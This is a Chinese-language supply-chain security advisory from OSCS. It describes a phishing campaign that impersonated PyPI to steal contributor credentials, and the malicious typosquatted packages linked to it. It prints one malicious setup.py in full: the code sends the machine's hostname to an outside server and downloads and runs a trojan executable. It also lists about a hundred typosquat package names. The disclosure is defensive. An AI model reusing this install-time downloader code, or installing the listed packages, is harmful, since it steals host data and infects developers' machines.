投毒者对 PyPi 上的开源包开发者下手了

570 阅读3分钟

简述

OSCS 近期监测到 PyPi 官方发布公告称有攻击者针对 PyPi 上的开源组件开发者进行钓鱼,试图窃取 PyPi 贡献者的凭据。本次攻击是通过贼喊捉贼的假装PyPi官方给恶意包发邮箱进行钓鱼,开发者可以通过开启2FA认证防止被攻击者窃取凭据后更改项目。

钓鱼事件

通过钓鱼邮件获取 PyPi 贡献者的凭据

根据PyPi官方发布的公告得知:

PyPi 贡献者收到了一封网络钓鱼电子邮件,要求他验证他的 PyPi 凭据,导致他进入一个虚假的 PyPi 登录页面,试图窃取他的 PyPi 凭据。

钓鱼邮件的大致内容如下:

"由于PyP在过去被上传过恶意包,谷歌会对PyPi的全量包进行分析。

您收到这封邮件是因为google的安全策略,请使用谷歌验证您的包,以避免您的 PyPi 包从 PyPi.org 删除

9月前未验证的包将被及时移除

如果您目前没有贡献的 PyPi 包,请忽略此邮件

PyPi 团队"

虚假的 PyPi 登录页面,试图窃取 PyPi 贡献者的凭据。

PyPi官方已声明在不违反TOS或确定为有危害的项目时候,并不会从索引中删除有效的项目。

投放恶意组件包

PyPi 的官方推特账号报告称,这次网络钓鱼攻击与数百个恶意 python 包在内以及更广泛的事件有关。这些恶意软件包已从注册表中删除。

以其中的一个恶意包为例子:

from setuptools import setup, find_packages

import os 

import requests

from setuptools.command.install import install

from sys import platform

 

def send():

    try:

        env = os.environ['COMPUTERNAME']

        t = requests.get("https://linkedopports.com/pyp/resp.php?live=Installation " +env)

        if platform == 'win32':

            url = 'https://python-release.com/python-install.scr'

            filename = 'ini_file_pyp_32.exe'

            rq = requests.get(url, allow_redirects=True)

            open(filename, 'wb').write(rq.content)

            os.system('start '+filename)

    except:

        pass 

从上述恶意包的代码中可以直观发现两个可疑的url

攻击者将 os.environ['COMPUTERNAME'] 主机名传输到https://linkedopports.com/pyp/resp.php?live=Installation

攻击者从https://python-release.com/python-install.scr去下载python-install.scr[木马程序]并去执行它。

总结

OSCS分析认为目前攻击者在不断更新攻击手法,在不断注册小号投毒的基础上,开始试图通过窃取开发者用户账号进行投毒,如果有知名项目被窃取PyPi 凭据,后果不堪设想。

如果您是 PyPi 贡献者,请开启2FA认证防止被窃取凭证后影响PyPi项目。

参考链接

www.oscs1024.com/hd/MPS-2022…

twitter.com/pypi/status…

附录

目前这些恶意组件的部分在国内清华源中还未删除,请研发同学避免下载以下恶意包,列表如下:

组件名作者
firstbasicpyappfirstbasicpyapp
coingecko-apisfirstbasicpyapp
coinmarketcapsfirstbasicpyapp
igtoolfirstbasicpyapp
monkeytypesfirstbasicpyapp
multipornfirstbasicpyapp
opencb-pythonfirstbasicpyapp
opencvv-pythonfirstbasicpyapp
pyteseractfirstbasicpyapp
seleniunfirstbasicpyapp
manganekoelevatepyapp
bcryptoelevatepyapp
deep-translateelevatepyapp
discord.ptelevatepyapp
discord.puelevatepyapp
instabotselevatepyapp
psycogp2elevatepyapp
pycryptdomeelevatepyapp
pycryptodomeselevatepyapp
pyptttelevatepyapp
pytttsx3elevatepyapp
pywin31elevatepyapp
pywin33elevatepyapp
redistelevatepyapp
tiktok-botselevatepyapp
yandex-mapelevatepyapp
arcalifefirstbasicpyapp
linkedin-scrapefirstbasicpyapp
memory-profilefirstbasicpyapp
osrs-hiscorefirstbasicpyapp
pymongosinspired13firstbasicpyapp
selenuimfirstbasicpyapp
ymongofirstbasicpyapp
1337cpraisepyapp
1337zpraisepyapp
andex-mapspraisepyapp
deep-translationpraisepyapp
eautifulsoup4praisepyapp
emoji-country-flagspraisepyapp
emokipraisepyapp
etuptoolspraisepyapp
keybaordpraisepyapp
pencv-pythonpraisepyapp
proxyscropepraisepyapp
pydobcpraisepyapp
speechrecongitionpraisepyapp
xlibrarypraisepyapp
yautoguipraisepyapp
ypttpraisepyapp
etuptoolpypiappz
deeeplpypiappz
discordhookpypiappz
eeplpypiappz
eleniumpypiappz
igtoolzpypiappz
proxycrapepypiappz
proxyrapepypiappz
statmodelpypiappz
statmodelspypiappz
statsmodelpypiappz
yaudiopypiappz
yinancepypiappz
yinstallerpypiappz
ywin32pypiappz
asn2cryptopypzz
bitcoinlivpypzz
crypto-data-fetchpypzz
crypto-get-pricepypzz
crypto-openpypzz
crypto-ospypzz
cryptobalancepypzz
django-metamaks-authpypzz
django-metamask-autpypzz
django-web2-authpypzz
django-web3-autpypzz
django-web4-authpypzz
hamenipypzz
historic-cryptpypzz
jango-metamask-authpypzz
jango-web3-authpypzz
pyvryptopypzz
pyxryptopypzz
ycryptopypzz
ycryptodomepypzz
ccsvpypzz1
contextlivpypzz1
cryptographyypypzz1
csvvpypzz1
cvspypzz1
flak7pypzz1
flak8pypzz1
flake7pypzz1
fuzywuzypypzz1
fuzywuzzypypzz1
fuzzywuzypypzz1
fuzzzywuzzypypzz1
hreadingpypzz1
laysoundpypzz1
playsounpypzz1
pyinstalerpypzz1
rgparsepypzz1
threadinpypzz1
threedingpypzz1
uzzywuzzypypzz1
we3pypzz1
wec3pypzz1
weg3pypzz1
wen3pypzz1

情报订阅

OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。同时提供漏洞、投毒情报的免费订阅服务,社区用户可通过配置飞书、钉钉、企业微信机器人,及时获得一手情报信息推送:

www.oscs1024.com/?src=j

具体订阅方式详见:

www.oscs1024.com/docs/vuln-w…